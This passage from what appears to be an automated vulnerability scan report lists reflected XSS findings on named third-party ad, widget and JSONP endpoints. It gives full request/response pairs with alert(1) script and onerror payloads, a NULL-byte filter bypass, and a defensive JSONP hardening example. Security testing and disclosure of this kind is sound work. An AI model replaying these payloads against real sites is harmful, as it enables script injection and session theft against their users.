This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /bubble/?request_id=3_Sacbee32dc1<img%20src%3da%20onerror%3dalert(1)>26594ea95cf&respond_path=LINGO.connect&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:29 GMT
Server: Google Frontend
Content-Length: 108

LINGO.connect.respond( {"status": "retry", "key": "3_Sacbee32dc1<img src=a onerror=alert(1)>26594ea95cf"} );

5.63. http://lingows.appspot.com/bubble/ [respond_path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /bubble/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 35685<script>alert(1)</script>490b8d7a6b2 was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bubble/?request_id=3_Sacbee&respond_path=LINGO.connect35685<script>alert(1)</script>490b8d7a6b2&try=1&key=3_Sacbee&lm=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:53 GMT
Server: Google Frontend
Content-Length: 105

LINGO.connect35685<script>alert(1)</script>490b8d7a6b2.respond( {"status": "retry", "key": "3_Sacbee"} );

5.64. http://lingows.appspot.com/content/LSXLXVUXQN/ [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/LSXLXVUXQN/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 9722d<script>alert(1)</script>4b38a362dd7 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7&respond_path=LINGO.connect&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5905
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:38 GMT
Server: Google Frontend
Content-Length: 15633

LINGO.connect.respond( {"key": "LSXLXVUXQN9722d<script>alert(1)</script>4b38a362dd7", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.65. http://lingows.appspot.com/content/LSXLXVUXQN/ [respond_path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/LSXLXVUXQN/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload fbbff<script>alert(1)</script>1d4f5de5d1c was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/LSXLXVUXQN/?request_id=LSXLXVUXQN&respond_path=fbbff<script>alert(1)</script>1d4f5de5d1c&try=1&count=3&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5882
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:08:01 GMT
Server: Google Frontend
Content-Length: 15620

fbbff<script>alert(1)</script>1d4f5de5d1c.respond( {"key": "LSXLXVUXQN", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.66. http://lingows.appspot.com/content/ZXANLLFMOV/ [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/ZXANLLFMOV/

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload 16238<script>alert(1)</script>fe8c9be795c was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c&respond_path=LINGO.connect&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5917
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:24 GMT
Server: Google Frontend
Content-Length: 18823

LINGO.connect.respond( {"key": "ZXANLLFMOV16238<script>alert(1)</script>fe8c9be795c", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.67. http://lingows.appspot.com/content/ZXANLLFMOV/ [respond_path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lingows.appspot.com
Path:   /content/ZXANLLFMOV/

Issue detail

The value of the respond_path request parameter is copied into the HTML document as plain text between tags. The payload 56500<script>alert(1)</script>339401737d was submitted in the respond_path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/ZXANLLFMOV/?request_id=ZXANLLFMOV&respond_path=LINGO.connect56500<script>alert(1)</script>339401737d&try=1&format=embed&mode=data&modified=1315604250000&url=http%3A//blogs.sacbee.com/the_state_worker/&width=300&title=Sacramento%20Bee%20--%20The%20State%20Worker HTTP/1.1
Host: lingows.appspot.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5894
content-type: text/javascript
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:07:46 GMT
Server: Google Frontend
Content-Length: 18822

LINGO.connect56500<script>alert(1)</script>339401737d.respond( {"key": "ZXANLLFMOV", "status": 200, "quality": "good", "content": {"doc": "\n\n<table class='lingo_widget' style='width: 300;' cellspacing='0' cellpadding='0'>
...[SNIP]...

5.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d5c"><script>alert(1)</script>31deefb90e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.comb9d5c"><script>alert(1)</script>31deefb90e7/ac/1726311578/Bottom3/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.69. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2b6"><script>alert(1)</script>5b6781c6a22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/nbc.com/ac@Bottom36d2b6"><script>alert(1)</script>5b6781c6a22 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://premium.mookie1.com/RealMedia/ads/click_lx.ads/nbc.com/ac/664256000/Bottom36d2b6"><script>alert(1)</script>5b6781c6a22/default/empty.gif/4d686437616b35697a42734143356436?x" target="_top">
...[SNIP]...

5.70. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is used, without validation, as the JSONP callback name and is therefore copied verbatim to the start of the script response. The payload 69220<script>alert(1)</script>530070fbb12 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the callback name is emitted as code rather than as data, output encoding cannot make this context safe; the name has to be checked against a strict identifier pattern and rejected otherwise. Note also that the JSESSIONID value in the response body carries a second payload (a8502<script>alert(1)</script>e55be4f7c60) that was not sent in this request's cookie, so the server is replaying a value supplied in an earlier request.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:57 GMT
Content-Length: 172
Content-Type: text/html

__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

5.71. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The value of the cb request parameter is used, without validation, as the JSONP callback name and is therefore copied verbatim to the start of the script response. The payload b735b<script>alert(1)</script>6863dfd174b was submitted in the cb parameter. This input was echoed unmodified in the application's response. Note that the response is served as text/plain rather than a script MIME type, and without X-Content-Type-Options: nosniff.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:03:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098192;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 01:03:12 GMT
Content-Length: 4004

TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b({"trc":{"req":"62cd8c982855cc3f7a6f23b1340af084","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_131
...[SNIP]...

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into a JSON string literal inside the JSONP response. The payload c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 was submitted in the url parameter. This input was echoed as c23af<img src=a onerror=alert(1)>8205f4fbbb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler rather than a script tag to introduce the JavaScript. Note that in this response the markup sits inside a double-quoted JSON string argument of a text/javascript body, so it executes only if that body is rendered as HTML, or if the consuming IN.Tags.Share.handleCount code writes the url field into the DOM without encoding it.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-LI-IDC=C1; bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G; NSC_MC_WT_FU_IUUQ=ffffffffaf1994c945525d5f4f58455e445a4a42198d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 182

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.reuters.com\/article\/2011\/09\/04\/us-weather-football-idUSTRE78222D20110904c23af<img src=a onerror=alert(1)>8205f4fbbb7"});

5.73. http://www.publish2.com/newsgroups/state-worker.js [_ parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The value of the _ request parameter is copied into a JSON string literal (the feedlink field) in the response. The payload aede9<a>fb44affacea was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Confidence is Firm rather than Certain here because the tag lands inside a double-quoted JSON string in a body served as application/json, so it reaches a browser as markup only if something renders that body as HTML.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=tjqibcmmv4ife4uj4v539uolt4; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=6pJEXIffSQeOxbFJRglsy1N3NgAhoMtdMg0KP5%2FMCS1HfmmNr3Jc4UrzwEAcqYQmxttgfAUC5fWHasy3%2BuUKcK8VH6PA6LJDnKm7GUG5M2J4HcEhb1cmLD%2BcGlocHzy%2BCA9ycFwrZSyf0cgynGrESRtIEbKRNRQaYkO4C%2Fv5KAGduUZjFPmMge%2FgVEePPdgA4mh8yj%2BAIeKVACzUCrRiBNj9hNLQSZ0ghY8I6b4OznDrCm5FrRwQnZJhEFCHdBWAq%2Fx86YMPs5UBVGGQxwwWchEqVUJ%2FGREixrecBVlbcJeKUI4C9af0OM1EbMfYd7amL26MSFTPGwXfLudqJ79Rg%2FfJOPurn0yLy8smVyr16RKXJ9PPEWZT; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12581

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:22 +0000","total
...[SNIP]...

5.74. http://www.publish2.com/newsgroups/state-worker.js [jsonp_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The value of the jsonp_callback request parameter is used, without validation, as the JSONP callback name and is therefore copied verbatim to the start of the script response (and again into the feedlink field). The payload 442ea<script>alert(1)</script>060310a8b2e was submitted in the jsonp_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e&_=1315097336789 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=f54702b4i9nutq0ri22oj2ip01; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=UjRvqJa9Eqx5QsHwXvtTAMlRPn1qqiKkaBofe%2BXITQxJQ4qocxvavqYqKhREHwrdbOrJ%2Fu8dghXYIhnb1PK%2FGa1yI4z2ClG0Tr36e08qdUGK5giXu45KviCKOjymZvAh4QGtRmz2puRlWEtbuX1soBcVfTsIym4QT2GSrDqo%2BPeyfoSk2SBwg%2FPiQFu5IjmNBMie2n0Yt5zUdDiHp2S17Kji7v%2FOnij3QnRVk%2FbdtToibIVs9BxzVpMsNVOzvOwfJ4HCZUN7pPZ1fQ9PLRxdUjlkK24nF2Aw61jWyLwlzyPsKyWYqdwwSg6YRn1nT9xutqwdXuK7syz026lFuBxN0fqCRL05hslZvNWzYkYAJe6Bf%2BEfmGgg; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12645

jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>
...[SNIP]...
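The four JSONP findings above (5.70, 5.71, 5.74: an unvalidated callback name emitted as code; 5.72, 5.73: HTML characters inside a JSON string value) share one fix. The following is an added example written for this page, not code from the report or from any of the sites it lists; the function names, the identifier pattern and the demo data are assumptions. It shows the vulnerable concatenation beside a hardened responder that rejects any callback that is not a dotted chain of JavaScript identifiers, escapes `<` and `>` inside the JSON body, and sends a script MIME type with `X-Content-Type-Options: nosniff` so the body is never rendered as HTML.

```javascript
// Added example (not code from the report or from the sites it lists):
// a JSONP responder that rejects the callback-name injection seen in
// 5.70, 5.71 and 5.74 and neutralises HTML inside JSON values (5.72, 5.73).

// A callback must be a dotted chain of JS identifiers, e.g.
// "TRC.callbacks.recommendations_1". Anything else is rejected outright;
// encoding is the wrong tool here because the value becomes code.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const CALLBACK_MAX = 128;

function isSafeCallback(name) {
  return typeof name === 'string' &&
    name.length > 0 && name.length <= CALLBACK_MAX &&
    CALLBACK_RE.test(name);
}

// Serialise data so the body can never contain a raw '<' or '>' (or the
// line terminators U+2028/U+2029); the result is still valid JSON and JS.
function safeJsonBody(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The vulnerable pattern from the report: the callback is concatenated as-is.
function renderJsonpUnsafe(callback, data) {
  return callback + '(' + JSON.stringify(data) + ');';
}

// Hardened: validate the name, answer with a script MIME type plus nosniff
// so the body is never sniffed into HTML, and lead with a comment so the
// first bytes are never attacker-chosen.
function renderJsonpSafe(callback, data) {
  if (!isSafeCallback(callback)) {
    return {
      status: 400,
      headers: { 'Content-Type': 'text/plain; charset=utf-8' },
      body: 'invalid callback',
    };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: '/**/' + callback + '(' + safeJsonBody(data) + ');',
  };
}

// Demo with the payload shape from 5.70 (strings constructed here):
const injectedName =
  '__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12';
console.log(renderJsonpUnsafe(injectedName, { ok: true }));
const demo = renderJsonpSafe(injectedName, { ok: true });
console.log(demo.status, demo.body);
console.log(renderJsonpSafe('TRC.callbacks.recommendations_1', { ok: true }).body);
```

The regex is deliberately stricter than what a JavaScript engine would accept as a member expression (no brackets, no unicode escapes) because the callback only needs to name a function the embedding page already defines; anything outside that shape is a 400, not an encoding problem.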

5.75. http://www.publish2.com/newsgroups/state-worker.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00d2877<a>a00f557732f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2877<a>a00f557732f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
